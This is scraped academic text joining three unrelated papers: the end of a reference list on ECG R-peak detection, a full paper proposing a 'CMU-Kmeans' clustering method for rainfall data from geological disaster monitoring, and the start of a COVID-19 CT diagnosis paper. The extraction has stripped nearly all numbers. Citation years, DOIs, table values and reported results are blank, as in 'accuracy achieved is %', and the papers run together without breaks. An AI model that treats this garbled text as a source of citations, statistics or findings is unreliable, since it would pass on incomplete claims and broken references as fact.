biomedicine ( ): – doi . /j.cmpb. . . . de chazal p, heneghan c, sheridan e, reilly r, nolan p, o’malley m. . automated processing of the single-lead electrocardiogram for the detection of obstructive sleep apnoea. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . dohare ak, kumar v, kumar r. . an efficient new method for the detection of qrs in electrocardiogram. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . elgendi m, eskofier b, dokos s, abbott d. . revisiting qrs detection methodologies for portable, wearable, battery-operated, and wireless ecg systems. plos one ( ):e doi . /journal.pone. . fujii t, nakano m, yamashita k, konishi t, izumi s, kawaguchi h, yoshimoto m. . 
noise-tolerant instantaneous heart rate and r-peak detection using short-term autocorrelation for wearable healthcare systems. in: th annual international conference of the ieee engineering in medicine and biology society (embc), osaka. – . kemp b, olivan j. . european data format ‘plus’ (edf+), an edf alike standard format for the exchange of physiological data. clinical neurophysiology ( ): – doi . /s - ( ) - . kemp b, värri a, rosa ac, nielsen kd, gade j. . a simple format for exchange of digitized polygraphic recordings. electroencephalography and clinical neurophysiology ( ): – . kohler b, hennig c, orglmeister r. . the principles of software qrs detection. ieee engineering in medicine and biology magazine ( ): – doi . / . . moody gb, mark rg. . the impact of the mit-bih arrhythmia database. ieee engineering in medicine and biology magazine ( ): – . moody gb, muldrow wk, mark rg. . a noise stress test for arrhythmia detectors. computers in cardiology : – . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. niskanen j-p, tarvainen mp, ranta-aho po, karjalainen pa. . software for advanced hrv analysis. computer methods and programs in biomedicine ( ): – doi . /j.cmpb. . . . pan j, tompkins wj. . a real-time qrs detection algorithm. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . pichot v, roche f, celle s, barthélémy j-c, chouchou f. . hrvanalysis: a free software for analyzing cardiac autonomic activity. frontiers in physiology : doi . /fphys. . . rodenhauser a, good ww, zenger b, tate j, aras k, burton b, macleod rs. . pfeifer: preprocessing framework for electrograms intermittently fiducialized from experimental recordings. journal of open source software ( ): doi . /joss. . sharma ld, sunkaria rk. . a robust qrs detection using novel pre-processing techniques and kurtosis based enhanced efficiency. measurement : – doi . /j.measurement. . . . thomsen mb, verduyn sc, stengl m, beekman jd, de pater g, van opstal j, volders pg, vos ma. . increased short-term variability of repolarization predicts d-sotalol-induced torsades de pointes in dogs. circulation ( ): – doi . / .cir. . .c . varon c, caicedo a, testelmans d, buyse b, huffel sv. . a novel algorithm for the automatic detection of sleep apnea from single-lead ecg. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . vicente j, johannesen l, galeotti l, strauss dg. . ecglab: user friendly ecg/vcg analysis tool for research environments. computing in cardiology : – . welch p. . the use of fast fourier transform for the estimation of power spectra: a method based on time averaging over short, modified periodograms. ieee transactions on audio and electroacoustics ( ): – doi . /tau. . . moeyersons et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /fphys. . http://dx.doi.org/ . /joss. http://dx.doi.org/ . /j.measurement. . . http://dx.doi.org/ . / .cir. . .c http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /tau. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
international journal of advanced network, monitoring and controls volume , no. , doi: .
/ijanmc- - application of k-means algorithm in geological disaster monitoring system wang jianguo college of computer science and engineering xi’an technological university no. middle xuefu road, weiyang district, xi’an, , china e-mail: wjg_xit@ .com, xue linyao * college of computer science and engineering xi’an technological university no. middle xuefu road, weiyang district, xi’an, , china e-mail: @qq.com abstract—the k-means algorithm is considered to be the most important unsupervised machine learning method in clustering, which can divide all the data into k subclasses that are very different from each other. as k-means algorithm is simple and efficient, it is applied to data mining, knowledge discovery and other fields. this paper proposes cmu-kmeans algorithm with improved upgma algorithm and canopy algorithm. the experimental results is that the algorithm can not only get the number k of the initial clustering center adaptable, but also avoid the influence of the noise data and the edge data. also, the improved algorithm can void the initial effect of the random selection on the clustering, which reflects the actual distribution in the dataset. keywords-clustering analysis; cmu-kmeans algorithm; geological disaster monitoring data i. introduction the occurrence of geological disasters caused great casualties to humans, the main reasons include landslides and debris flow and rainfall and so on. and these geological disasters always cause many local public facilities to be damaged by large and small, and brought great damage to the people and their property. also, there are still many such cases in china. faced with such a severe threat of geological disasters, the state and the government on the prevention and control of geological disasters into a lot of human and material resources, and achieved remarkable results. with the progress of technology and high development of information technology, many new detection equipments have been put into the geological disaster real-time detection, such as gps, secondary sound wave monitoring, radar and so on. with the development of geological hazard detection technology, the amount of the monitoring data grew by leaps and bounds, data types are becoming more and more complex as well. k-means algorithm is a clustering algorithm based on the classification of the classic algorithm, the algorithm in the industrial and commercial applications more widely. as we all know, it both has many advantages and many disadvantages. in this paper, we mainly study the optimization of the initial clustering center and the avoidance of the blindness of the k-value selection, and propose the cmu-kmeans algorithm. the data source of the study is the historical data detected by the geological disaster monitoring system, and records are randomly selected from the rainfall data of different areas in shaanxi province as the research object, which are served as a representative sample of the improved k-means clustering algorithm. the experimental results show that the improved algorithm not only eliminates the sensitivity to the initial input and improve the stability and effectiveness of the algorithm, but also can intelligently determine the initial clustering center number k, which improves the simplicity and operability of the algorithm. a. overview of k-means algorithm the k-means algorithm is a classical unsupervised clustering algorithm. 
the purpose is to divide a given dataset containing n objects into k clusters so that the objects within a cluster are as similar as possible, while the objects in different clusters are as dissimilar as possible. let the sample set be $x = \{x_1, x_2, x_3, \ldots, x_n\}$, where n is the number of samples. the idea of the k-means algorithm is that k data objects are randomly selected from the sample set x as the initial clustering centers; each data object is then allocated to the most similar cluster according to its similarity to the k clustering centers, the mean of every new cluster is recalculated and taken as the next clustering center, and the process is repeated until the updated cluster centers no longer change, that is, until the criterion function e converges. the goal is to maximize the similarity of objects within a cluster and to minimize the similarity of objects between clusters. the degree of similarity between data objects can be measured by the euclidean distance. for an n-dimensional real vector space, the euclidean distance between two points is defined as
$d(x, y) = \sqrt{\sum_{i=1}^{n} (x_i - y_i)^2}$
here, $x_i$ and $y_i$ are the attribute values of x and y respectively. the criterion function is defined as
$e = \sum_{j=1}^{k} \sum_{x \in c_j} \lVert x - z_j \rVert^2$
here, k is the total number of clusters and $z_j$ is the center of cluster $c_j$. the flow of the k-means algorithm is shown in fig. .
figure . k-means clustering algorithm flow chart
b. research status quo of k-means algorithm
because of its advantages, the k-means algorithm has been widely used in practice, but it also has several shortcomings. to obtain a better clustering effect, many researchers have explored ways of remedying them. aiming at the weakness of the k-means algorithm in selecting the initial points, many scholars have proposed improved methods. duan guiqin [ ] optimizes the initial clustering centers with a method based on the product of the mean and the maximum distance: the algorithm first adds the data objects of the sample set that are farthest apart to the clustering center set, and then adds the data object that maximizes the product criterion with respect to the mean and the current clustering centers, which improves the accuracy. yi baolin et al. [ ] proposed another improved k-means algorithm, which first calculates the density of the region to which each data object belongs and then selects k points in the high-density regions as the initial centers; their experiments show that the algorithm reduces the influence of the initial center points. yiu-ming cheng [ ] and others proposed a new clustering technique called the k*-means algorithm, which consists of two separate steps: a center point is provided for each cluster in the first step, and the units are then adjusted through adaptive learning rules in the second step. the algorithm overcomes the initial-center sensitivity and the blindness of choosing k in the k-means algorithm, but its computation is complicated. xie and others [ ] proposed a k-means algorithm that optimizes the initial clustering centers using the minimum variance based on the compactness of the sample space distribution; the algorithm chooses the samples with the smallest variance that also lie at a distance from each other as the initial clustering centers. liu jiaxing et al. [ ] proposed a radius-based k-means + λ algorithm.
when selecting the initial center point of the cluster, the distance ratio between points is calculated from the λ parameter and rounded at a specific distance. in the circle, an initialized center point is selected according to the distance ratio, and the algorithm has higher performance in error rate and operation time. ren jiangtao[ ] proposed an improved k-means algorithm for text clustering, which is improved by using feature selection and dimension reduction, sparse vector selection, initial center point search based on density and spreading, class accuracy, stability and other aspects have improved. c. the performance analysis of k-means algorithm k-means clustering algorithm uses the euclidean distance to calculate the distance between each sample point. for the convex and spherical data distribution, the clustering effect is better and has been widely used in many fields. however, the euclidean distance criterion adopted by the algorithm also has some limitations. for the more complicated or non-convex data, the clustering effect is often not very satisfactory. clustering algorithm in the iterative process, if you do not meet the termination criteria will recalculate the average clustering center, this operation also improves the convergence rate of the clustering algorithm. in summary, k-means clustering algorithm has the following advantages and disadvantages of the following aspects. ) the main advantages of k-means algorithm: a) k-means clustering algorithm has high stability and scalability, clustering effect is very well. b) the results of the treatment is intuitive and easy to understand. when dealing with the target data in numerical form, its geometric meaning is very clear. when clustering images and texts, the extracted eigenvalues can be regarded as clustering result values for the convenience of people's understanding. c) k-means clustering algorithm when dealing with numerical data sets, the input data sequence will not affect the clustering result. d) it can be a good judge of the data set shape is convex cluster. ) the main shortcomings of k-means algorithm: a) the k value in the k-means algorithm needs to be given in advance. according to the k value determined in advance, the clustering samples are classified into k class, so that the sum of squares of all the samples in the clustering domain to the clustering center is minimized. b) clustering results are highly dependent on the selection of initial clustering centers. the k-means algorithm uses the stochastic method to select the initial clustering center. if the initial clustering center is chosen improperly, it is difficult to obtain the ideal clustering effect. this dependence on the initial value may lead to the international journal of advanced network, monitoring and controls volume , no. , instability of the clustering results, and it is easy to fall into the local optimal rather than the global optimal results. c) sensitive to noise and isolated points. d) the time complexity of the algorithm is large. ii. improvement of k-means algorithm and its application aiming at the shortcomings of traditional k-means algorithm, this paper mainly improves on the optimization of initial clustering center to enhance the clustering effect. a. 
the selection of data object in cluster analysis the preliminary data are collected firstly when data selecting, then know about the characteristics of data to identify the quality of the data and to find a basic observation of the data or assume the implied information to monitor the subset of data of interest. the data object segmentation variable determines the formation of clustering, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clustering clusters after the new data objects are added. before the k-means clustering related data mining, the sample data set related to the data mining clustering analysis should be extracted from the original data object set, and it is not necessary to use all the historical data. in addition, we should pay attention to the quality of data, only high-quality data to the correct analysis of conclusions everywhere, to provide a scientific basis for clustering. the source of this research object is the historical monitoring data of the geological disaster monitoring system. from the records of geological monitoring data from to , a representative sample of k-means clustering algorithm for this improved algorithm is selected as the object of study in , and the two samples of rainfall are randomly selected in different regions. the sample data attributes show as table : table i. the sample data attributes field number field name field code type of data id xx number sno yy varchar type type varchar gettime time datatime alarm level alarm integer value value double day value d_value double for the cluster analysis, there are obviously redundant ones in the data attributes of the above geological hazard monitoring system, and it does not have the objectivity of the cluster analysis data. therefore, the redundant ones should be eliminated. finally, only four data object attributes reflecting the characteristics of rainfall data are selected as the research object. the optimized data attributes show as table : table ii. the optimized data attributes field number field name field code type of data id xx number sno yy varchar gettime time datatime day value d_value double b. improvement of k-means algorithm it is not difficult to see that, through the above study of the status quo, we can see that most of the above algorithm improvements are only a single defect in the traditional k- means algorithm is optimized. although these improvements have optimized the k-means algorithm to some extent, there are still many shortcomings. for the above geological disaster monitoring system rainfall data characteristics, the k-means algorithm is very sensitive to the initialization center, and the initial clustering center is very easy to make the clustering result into the local optimum and the influence of the isolated point is large. in this paper, the simple random sampling technique is used to reduce the scale of the data set on the original dataset, and then the improved upgma algorithm and canopy algorithm are combined to propose the cmu-kmeans algorithm. the improved algorithm can select the points with the furthest distance k in the high density region as the initial clustering center according to the regional density of each data, so that the improved k-means algorithm can produce high quality poly the results show that the sensitivity of the algorithm is not only eliminated, but also the stability and validity of the algorithm are improved. 
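a minimal sketch of the data-preparation step just described (keeping only the four attributes of table ii and drawing a simple random sample to reduce the data-set scale) is shown below. the file name, column names and sampling fraction are assumptions for illustration, since the real monitoring-database schema and sample size are not given here.

```python
import pandas as pd

# load raw rainfall monitoring records (hypothetical file name)
records = pd.read_csv("rainfall_monitoring.csv")

# keep only the attributes retained in table ii: id, sno, gettime, day value
selected = records[["id", "sno", "gettime", "d_value"]]

# simple random sampling to reduce the scale of the data set
sample = selected.sample(frac=0.1, random_state=0)
```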
) improved upgma algorithm
a) the basic idea of the improved upgma algorithm
at the beginning of the upgma algorithm, each data object in the sample data set is considered as a separate class. the distance between every two data objects is calculated to obtain the distance matrix, and the two classes that are closest to each other are merged into a new subclass; this process is repeated, and the upgma algorithm stops when no new class is generated or the stop condition is satisfied. it can be observed that the first subclasses to form are usually located in the dense areas of the data set, so the centers of the subclasses selected by this algorithm can be used as the initial clustering center candidate points for the next step. in this way, the selection of the initial clustering centers is optimized and its accuracy is improved. the distance between two data objects is measured using the euclidean distance formula
$d(x_i, x_j) = \sqrt{\sum_{k=1}^{m} (x_{ik} - x_{jk})^2}$
here, $x_i$ and $x_j$ represent data objects in the sample data set, with $x_i = \{x_{i1}, x_{i2}, \ldots, x_{ik}, \ldots, x_{im}\}$ and $x_j = \{x_{j1}, x_{j2}, \ldots, x_{jk}, \ldots, x_{jm}\}$, $k = 1, 2, \ldots, m$. the center of a subclass is calculated as
$z = \frac{1}{n} \sum_{j=1}^{n} x_j$
here, n refers to the number of data objects contained in a subclass, and $x_j$ refers to a data object in the subclass.
b) the description of the improved upgma algorithm
input: all data in the sample data set; parameters m, p, q.
output: initial clustering center candidate points.
( ) set each data object as a separate class;
( ) calculate the distance between every two data objects, then merge the nearest two classes into a new subclass, and determine whether subclasses containing no less than m% of the total amount of data continue to be produced; if not, go to ( );
( ) for (i = 1 to maxcluster) { for (j = i + 1 to maxcluster) { if the number of data objects in subclasses i and j is less than or equal to m% of the total amount of data, calculate the distance between them to obtain the distance matrix. } } find the nearest two subclasses i and j, merge them into a new subclass, add the new subclass to the end of the sequence q, and go to ( );
( ) select the first p% of the subclasses in the sequence q as the candidate subclasses and take the centers of all candidate subclasses as the initial clustering center candidate points.
using the advantage of the improved upgma hierarchical clustering algorithm, the dense regions of the data set can be found, which prevents edge data and noise data from becoming initial center candidate points. at the same time, considering the relative density of each region, new clustering conditions and filter conditions are proposed to modify the traditional upgma algorithm, so that the generation of subtrees can be stopped at different clustering levels to adapt to the actual density distribution of the data set. however, the improved upgma algorithm also has some shortcomings: for example, if the values of m% and p% are not set properly, the selected initial clustering center candidate points may be too dense and too concentrated. the canopy algorithm, which introduces the idea of the maximum-minimum distance, can select data points that are far apart from each other, and is therefore suitable for making up the deficiencies of the improved upgma algorithm.
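a rough, naive python sketch of the candidate-generation idea described in this subsection is given below: pairs of nearest subclasses are merged, a subclass is frozen once it holds at least m% of the data, and the centroids of the earliest-formed (densest) subclasses are returned as candidates. this is illustrative only and not the authors' implementation; m_frac and p_frac are assumed example values, and the quadratic pairwise search is kept for clarity rather than efficiency.

```python
import numpy as np
from itertools import combinations

def upgma_candidates(X, m_frac=0.05, p_frac=0.2):
    """return centroids of the first p_frac of 'dense' subclasses as
    initial-center candidate points (sketch of the improved upgma step)."""
    n = len(X)
    clusters = [[i] for i in range(n)]   # every point starts as its own class
    finished = []                        # subclasses in order of creation
    while len(clusters) > 1:
        # find the closest pair of current subclasses (centroid distance)
        best, pair = None, None
        for a, b in combinations(range(len(clusters)), 2):
            d = np.linalg.norm(X[clusters[a]].mean(0) - X[clusters[b]].mean(0))
            if best is None or d < best:
                best, pair = d, (a, b)
        a, b = pair
        merged = clusters[a] + clusters[b]
        clusters = [c for i, c in enumerate(clusters) if i not in pair]
        if len(merged) >= m_frac * n:
            finished.append(merged)      # dense enough: freeze this subclass
        else:
            clusters.append(merged)
        if not clusters:
            break
    keep = max(1, int(p_frac * len(finished))) if finished else 0
    return np.array([X[c].mean(0) for c in finished[:keep]])
```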
therefore, it is necessary to introduce the canopy algorithm to ensure that the distribution of the initial clustering center is decentralized, which can correctly reflect the data distribution of the original data set. ) improved canopy algorithm in order to avoid the clustering process is locally optimal, it is necessary to make canopy get the center point spacing as large as possible. the maximum and minimum distance method [ ] is a kind of test-based algorithm in the field of pattern recognition. its basic idea is to take the object as far as possible as a cluster center, trying to get a better initial division. the algorithm not only intelligently determines the number k in the initial clustering, but also improves the efficiency of dividing the initial data set. a) the description of improved canopy algorithm the euclidean distance method is used to measure the degree of dissimilarity between data objects. set the data set, s={x ,x ,…,xn}, and the initial cluster center set is v = {v , v , ..., vn}. the improved canopy algorithm is described as follows: input: improve the initial clustering center candidate point of the upgma algorithm output, the parameter θ; output: optimize the initial clustering center. ( ) arbitrarily select a data object from the data set s as the first cluster center point v and put it into v; ( ) calculate the distance between v and all the data objects remaining in the data set s, and put the farthest data object into v as the second cluster center v ; ( ) calculate the distance di between all the data objects xi and all the data objects remaining in the data set s, select the smaller distance and denote min (di); ( ) selects the maximum value in all the min(di) , marked as max (min (di)), and regard the corresponding data xi as the candidate cluster center, then judgment is made by the discriminant formula max (min (di))> θ || v - v ||. if the condition is satisfied, xi is added to the initial clustering center set v, and if it is not satisfied, ( ) to ( ); ( ) output optimization of the initial clustering center. the most critical step in the improved canopy algorithm is the step ( ), which takes the corresponding point of max as the candidate of the new clustering center, thus avoiding the fact that the distance from an existing clustering center is closer to the other clustering centers are far away as candidates for possible candidates. therefore, the algorithm can be used to ensure that each new clustering center is far from the distance of the existing clustering center. b) the analysis of advantages and disadvantages of improved algorithm of canopy the improved canopy algorithm can use the k data objects farthest from each other in the data set as the initial clustering center, so as to avoid the situation that the initial clustering center distribution is too concentrated and intensive. but on the one hand, it is possible to select the noise data and the edge data, making the algorithm easy to fall into the local optimal solution, it is difficult to get the global optimal solution. on the other hand, if the sample size of the whole data set is n, we need to scan the database first if we want to find a new cluster center each time; after finding the nearest distance from each object to the existing cluster center, we need scan the database to get the maximum-minimum distance. so we need a total of n distance calculation. 
the time complexity of the improved canopy algorithm is o(nk) when k clustering centers have to be found by the end of the algorithm. its computational cost therefore depends on the size of n, and large databases usually contain many thousands of objects, so if the original data set is processed with the improved canopy algorithm directly, the implementation efficiency is low and the required storage space increases significantly.
) cmu-kmeans algorithm
generally, in order to fully reflect the distribution of the data in the entire data set, every cluster center should lie in a high-density area of the data set and the centers should be dispersed as much as possible. based on these considerations, this paper proposes the cmu-kmeans algorithm, which combines the improved upgma algorithm and the improved canopy algorithm to obtain optimized initial clustering centers and then applies these centers to the k-means algorithm to enhance the clustering effect. the improved upgma algorithm is used to find the high-density regions, so that the selected initial clustering center candidate points stay away from noise data and edge data; the improved canopy algorithm is used to prevent the initial clustering centers from being too concentrated and dense, ensuring that the distances between the cluster centers are large and that the centers fully reflect the overall distribution of the data set. the two algorithms therefore complement each other, so that the initial clustering centers selected by the algorithm are far apart from each other and are all located in the high-density regions of the data set. to sum up, the cmu-kmeans algorithm proceeds as follows (a brief code sketch of these stages is given after the figure caption below):
a) initialization of the cluster centers: the improved upgma algorithm obtains the initial clustering center candidate points, and the improved canopy algorithm then obtains the appropriate initial clustering centers;
b) k-means algorithm iteration;
c) assessment of the clustering results.
the framework of the cmu-kmeans algorithm is thus divided into three phases, as shown in fig. . the first stage is the initial optimization algorithm, which is the most important part of the improvement; its purpose is to intelligently capture the optimal initial clustering seeds and the optimal initial number of clusters from the distribution of the data set. the second stage is the main body of the algorithm, in which the k-means algorithm is used to cluster the whole data set and obtain the clustering result. the third stage is the experimental evaluation, which verifies the validity of the proposed cmu-kmeans algorithm.
figure . cmu-kmeans algorithm framework
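as promised above, the sketch below illustrates the remaining two ingredients of the pipeline: a canopy-style maximum-minimum distance selection over the upgma candidate points, followed by a standard k-means iteration seeded with the selected centers. it is a hedged illustration, not the authors' code: theta is an assumed example value, and scikit-learn's kmeans is used only as a stand-in for the final iteration step.

```python
import numpy as np
from sklearn.cluster import KMeans

def maxmin_centres(candidates, theta=0.5):
    """keep adding the candidate whose distance to its nearest selected
    centre is largest, while that distance exceeds theta * ||v1 - v2||."""
    cands = [np.asarray(c, dtype=float) for c in candidates]
    if len(cands) < 2:
        return np.vstack(cands)
    v = [cands[0]]                                  # first centre: arbitrary candidate
    d0 = [np.linalg.norm(c - v[0]) for c in cands]
    v.append(cands[int(np.argmax(d0))])             # second centre: farthest from the first
    base = np.linalg.norm(v[0] - v[1])
    while True:
        dmin = [min(np.linalg.norm(c - vi) for vi in v) for c in cands]
        i = int(np.argmax(dmin))
        if dmin[i] > theta * base:
            v.append(cands[i])
        else:
            break
    return np.vstack(v)

def cmu_kmeans(X, candidates, theta=0.5):
    """three-stage sketch: upgma candidates -> max-min initial centres ->
    k-means iteration from those centres."""
    init = maxmin_centres(candidates, theta)
    km = KMeans(n_clusters=len(init), init=init, n_init=1).fit(X)
    return km.labels_, km.cluster_centers_
```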
the cmu-kmeans algorithm proposed in this paper can effectively reduce the dependency of the k-means algorithm on the selection of the initial clustering centers. for data sets with an uneven distribution it avoids, on the one hand, initial clustering centers that are too dense and, on the other hand, initial clustering centers that are too scattered or that even include noise data and edge data, which improves the stability and validity of the algorithm. at the same time, the number k of initial clustering centers can be determined automatically without being preset, which improves the simplicity and operability of the algorithm.
iii. experiment analysis
a. experimental description
the data set selected for the experiment comes from the rainfall data collected by the geological hazard detection system and from the rainfall data set after artificial noise is added. the experimental environment is an inter(r) core(tm) i - m cpu, g ram, a g hard disk and the win operating system. in order to verify the validity and stability of the algorithm, the traditional k-means clustering algorithm, the improved canopy algorithm and the cmu-kmeans algorithm are compared on the rainfall data set. the clustering result reported for the traditional k-means algorithm is an average over several executions. the performance of the algorithms is evaluated according to the precision and the recall of the clustering results.
b. performance evaluation criteria
the traditional k-means algorithm, the improved canopy algorithm and the cmu-kmeans algorithm proposed in this paper are evaluated with the commonly used criteria for the quality of a clustering, namely precision and recall, which are defined as follows:
$p(i, j) = \mathrm{precision}(i, j) = n_{i,j} / n_i$
$r(i, j) = \mathrm{recall}(i, j) = n_{i,j} / n_j$
here, $n_{i,j}$ represents the number of objects of class i in cluster j, $n_i$ is the number of all objects in class i, and $n_j$ is the number of all objects in cluster j.
c. experimental content and structure analysis
the table below shows the detailed experimental results of the three algorithms on the rainfall data set of the geological disaster monitoring system.
table iii. detailed experimental results on the rainfall dataset (precision and recall of the k-means algorithm, the improved canopy algorithm and the cmu-kmeans algorithm for each of the ten runs, together with their averages)
as can be seen from the table, over the ten experiments the values of the two performance evaluation criteria (precision and recall) vary greatly for the traditional k-means algorithm, showing a very unstable state: the gap between the minimum and the maximum of the ten precision results is large, and the recall shows a similar spread. the results of the improved canopy algorithm are better, with a smaller difference in precision. for the cmu-kmeans algorithm, the values of both criteria are clearly improved and remain stable, with only a small difference between the minimum and maximum precision and recall values over the ten runs.
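the evaluation criteria defined in section b can be computed directly from the true class labels and the cluster assignments. the short python sketch below follows the paper's definitions as written ($p = n_{i,j}/n_i$, $r = n_{i,j}/n_j$); it is an illustrative helper, not the authors' evaluation script.

```python
import numpy as np

def precision_recall(true_labels, cluster_labels):
    """return matrices p[i, j] and r[i, j] over all class/cluster pairs,
    using the definitions given in the text above."""
    true_labels = np.asarray(true_labels)
    cluster_labels = np.asarray(cluster_labels)
    classes, clusters = np.unique(true_labels), np.unique(cluster_labels)
    p = np.zeros((len(classes), len(clusters)))
    r = np.zeros_like(p)
    for a, i in enumerate(classes):
        for b, j in enumerate(clusters):
            n_ij = np.sum((true_labels == i) & (cluster_labels == j))
            n_i = np.sum(true_labels == i)      # all objects of class i
            n_j = np.sum(cluster_labels == j)   # all objects in cluster j
            p[a, b] = n_ij / n_i if n_i else 0.0
            r[a, b] = n_ij / n_j if n_j else 0.0
    return p, r
```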
in order to make the experimental results more intuitive, the results above are also shown as line charts, so that the stability and the accuracy of the algorithms can be compared.
figure . the precision and recall values of the traditional k-means algorithm
figure . the precision and recall values of the improved canopy algorithm
figure . the precision and recall values of the cmu-kmeans algorithm
it can be seen from the figures that the clustering effect of the improved canopy algorithm improves on that of the traditional k-means algorithm, and that the cmu-kmeans algorithm further improves on the improved canopy algorithm: the fluctuations of its precision and recall values are small and both values are clearly higher, so the improvement is significant.
iv. conclusion
the cmu-kmeans algorithm improves the clustering effect, makes the performance stable, and clearly reduces the computational complexity compared with the traditional k-means algorithm and the improved canopy algorithm. in addition, the algorithm can adaptively determine the number k of initial clustering centers, avoids the influence of noise data, edge data and the random selection of the initial clustering centers, and reflects well the actual distribution of the cluster centers in the data set.
references
[ ] zhai d h, yu j, gao f, et al. k-means text clustering algorithm based on initial cluster centers selection according to maximum distance [j]. application research of computers.
[ ] baolin yi, haiquan qiao, fan yang, chenwei xu. an improved initialization center algorithm for k-means clustering [c]. computational intelligence and software engineering.
[ ] redmond s j, heneghan c. a method for initializing the k-means clustering algorithm using kd-trees [j]. pattern recognition letters.
[ ] liu j x, zhu g h, xi m. a k-means algorithm based on the radius [j]. journal of guilin university of electronic technology.
[ ] habibpour r, khalipour k. a new k-means and k-nearest-neighbor algorithms for text document clustering [j]. international journal of academic research part a.
[ ] shu-hsien liao, pei-hui chu, pei-yuan hsiao. data mining techniques and applications - a decade review [j]. expert systems with applications.
[ ] ying wu, chun long yao. application of improved k-means clustering algorithm in transit data collection [c]. rd international conference on biomedical engineering and informatics (bmet).
[ ] zhou a w, yu y f. the research about clustering algorithm of k-means [j]. computer technology and development.
[ ] duan g q. auto generation cloud optimization based on genetic algorithm [j]. computer and digital engineering.
[ ] wang c l, zhang j x. improved k-means algorithm based on latent dirichlet allocation for text clustering [j]. journal of computer applications.
[ ] deepa v k, geetha j r r. rapid development of applications in data mining [c]. green high performance computing (icghpc).
[ ] sharma s, agrawal j, agarwal s, et al. machine learning techniques for data mining: a survey [c]. computational intelligence and computing research (iccic).
[ ] mohamed abubaker, wesam ashour. efficient data clustering algorithms: improvements over k-means [j].
international journal of intelligent systems and applications (ijisa).
[ ] fahad a, alshatri n, tari z, alamri a. a survey of clustering algorithms for big data: taxonomy and empirical analysis [c]. emerging topics in computing.
[ ] abubaker m, ashour wesam. efficient data clustering algorithms: improvements over k-means [j]. international journal of intelligent systems and applications.
[ ] tang zhaoxia, zhang hui. improved k-means clustering algorithm based on genetic algorithm [c]. telkomnika indonesian journal of electrical engineering.
fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features
dina a. ragab and omneya attallah
electronics and communications engineering department, arab academy for science, technology, and maritime transport (aastmt), alexandria, egypt
abstract
the precise and rapid diagnosis of coronavirus (covid- ) at the very primary stage helps doctors to manage patients under high workload conditions and prevents the spread of this pandemic virus. computer-aided diagnosis (cad) based on artificial intelligence (ai) techniques can be used to distinguish covid- from non-covid- cases in computed tomography (ct) images. furthermore, cad systems can deliver an accurate and faster covid- diagnosis, which saves time for disease control and provides a more efficient diagnosis than laboratory tests. in this study, a novel cad system called fusi-cad based on ai techniques is proposed. almost all the methods in the literature are based on individual convolutional neural networks (cnn). consequently, the fusi-cad system is based on the fusion of multiple different cnn architectures with three handcrafted feature sets, namely statistical features and textural analysis features such as the discrete wavelet transform (dwt) and the grey level co-occurrence matrix (glcm), which were not previously utilized in coronavirus diagnosis. the sars-cov- ct-scan dataset is used to test the performance of the proposed fusi-cad. the results show that the proposed system can accurately differentiate between covid- and non-covid- images, as the accuracy achieved is %. additionally, the system proved to be reliable, as the sensitivity, specificity, and precision reached % and the diagnostic odds ratio (dor) is ≥ . furthermore, the results are compared with recent related studies based on the same dataset, and the comparison verifies the competence of the proposed fusi-cad over the other related cad systems. thus, the novel fusi-cad system can be employed in real diagnostic scenarios to achieve accurate testing for covid- and to avoid the human misdiagnosis that might arise from human fatigue. it can also reduce the time and effort expended by radiologists during the examination process.
subjects artificial intelligence, computer aided design, computer vision keywords computer-aided diagnosis (cad), convolution neural networks (cnn), coronavirus (covid- ), discrete wavelet transform (dwt), grey level co-occurrence matrix (glcm) introduction the novel virus known as the severe acute respiratory syndrome coronavirus (sars-cov- ) has emerged in december in wuhan, china. patients diseased with sars-cov- can experience a medical condition known as coronavirus diseases how to cite this article ragab da, attallah o. . fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted september published october corresponding authors dina a. ragab, dinaragab@aast.edu omneya attallah, o.attallah@aast.edu academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright ragab and attallah distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dinaragab@�aast.�edu mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (covid- ). this new coronavirus has quickly spread to other zones in china and other countries with significant morbidity and mortality rates. on april , , more than , covid- infected patients have been verified in china, and more than . million patients worldwide (dong et al., ). covid- may lead to critical respiratory illness, acute pneumonia, numerous organs failure, and even death (cheng et al., ). for this reason, the early detection of this virus is essential, as it is achieving a primary initial assessment so that the succeeding arrangement of suitable treatments and follow-ups can be set in advance. pandemic covid- has led to a rapid increase in the number of new patients. consequently, an overload in hospital capacity occurred, and healthcare management became a difficult task (wu et al., ; paules, marston & fauci, ). in addition, the doctors and nurses are at risk of being infected, and thus they will not be capable of helping patients and managing their jobs (butt et al., ). therefore, a rapid and accurate diagnostic tool is crucial to help doctors in managing their patients. the standard way of screening infected patients is known as the reverse-transcription polymerase chain reaction (rt-pcr) testing (dong et al., ). although rt-pcr is the common method to diagnose covid- cases, it has some limitations. first, the sensitivity of the rt-pcr test is not quite high, and therefore covid- disease may not be completely omitted, despite if rt-pcr outcomes from a suspected case are negative (ai et al., ). moreover, the inadequate quantity and firm necessities for laboratory settings would critically postpone precise identification of suspected individuals, which has modeled extraordinary challenges to avoid the propagation of the disease worldwide, specifically in the middle of the epidemic region (xie et al., ). thus, medical imaging, in specific, chest-computed tomography (ct), is 